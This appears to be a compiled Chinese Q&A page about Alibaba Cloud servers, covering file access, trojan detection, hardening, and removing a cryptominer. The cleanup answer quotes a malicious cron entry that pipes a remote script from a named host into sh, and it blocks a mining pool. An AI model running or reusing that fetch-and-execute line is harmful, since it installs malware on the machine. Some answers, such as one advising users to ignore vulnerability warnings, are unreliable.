1. 怎样访问阿里云服务器上的文件
通过ftp工具,比如filezilla软件,连接上阿里云服务器后,就可以上传下载文件了
2. 阿里云服务器检测说有木马,但具体是不是真的,请赐教。
看上去像是,因为我观察到服务器中木马的一种同样的现象,就是伪装成所谓的正常文件来欺骗过用户的眼睛。(例如图中的 /etc/init.d/selinux这种与服务器日常运行稳定不太相关的东西是被替换的高发文件)
同样,图中下面提到的/usr/bin/bsd-port 也并不是linux本来就有的东西(如果你没有安装过),这的确可疑。
赶紧上服务器删文件去吧,这确实是中木马了。
3. 阿里云服务器怎么看服务器里面的文件
windows可以远程桌面连接啊,linux的话可以用ssh的方式登录到linux服务器上然后用ls的方式查看文件,用cd .. 或者 cd 目录名字切换目录。
4. 远程连接阿里云服务器出现这个
这样显示是正常的。这是字符界面,输入用户和密码就可以进入系统了
5. 我的阿里云服务器怎么能保证安全不被人攻击啊
防止阿里云服务器不被攻击:
首先系统内部安全要做好,系统漏洞补丁要打好,防火墙的策略、开放那些端口访问,允许那些IP访问,这些基本的设置要做好。
使用一些专业的安全漏洞扫描工具,阿里云自己有一个安全分析工具叫态势感知,利用工具可以分析发现潜在的入侵和高隐蔽性攻击威胁。
使用一些管理工具管理阿里云主机,可以很方便的管理阿里云主机,可以设置管理成员的权限,防止管理混乱,减少对外端口开放,还附带安全漏洞检查。
遭遇到DDoS攻击,需要购买第三方防DDoS攻击的服务,阿里云市场里面有云盾DDoS、东软、服务器安全加固及优化等一些防攻击的产品。
6. 阿里云服务器被挖矿了怎么办(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
7. 请问阿里云的服务器出现了500异常怎么解决
这个是服务器错误,可以打官网的人工客服电话,然后让他给你解决。一般是没有大的问题的。
8. 网站被百度和阿里云发现有非法信息,但是检查服务器后台没有发现这类文件和文件夹
一般有非法信息,是你的文件或链接处有一些瘾文件信息,所以你也不发现,所以要从新建立再试一下。
9. 阿里云服务器漏洞修复怎么修复
这种提示我见过很多,基本上每个客户都有这个提示,可以不用理会,你看看提示内容就知道了,都是系统的,你网站有后门被篡改跟这个关系不大,除非高危的,一般给别人处理安全问题都是程序问题比较多,你网站有安全问题可以找额给你解决,后面就不会被篡改了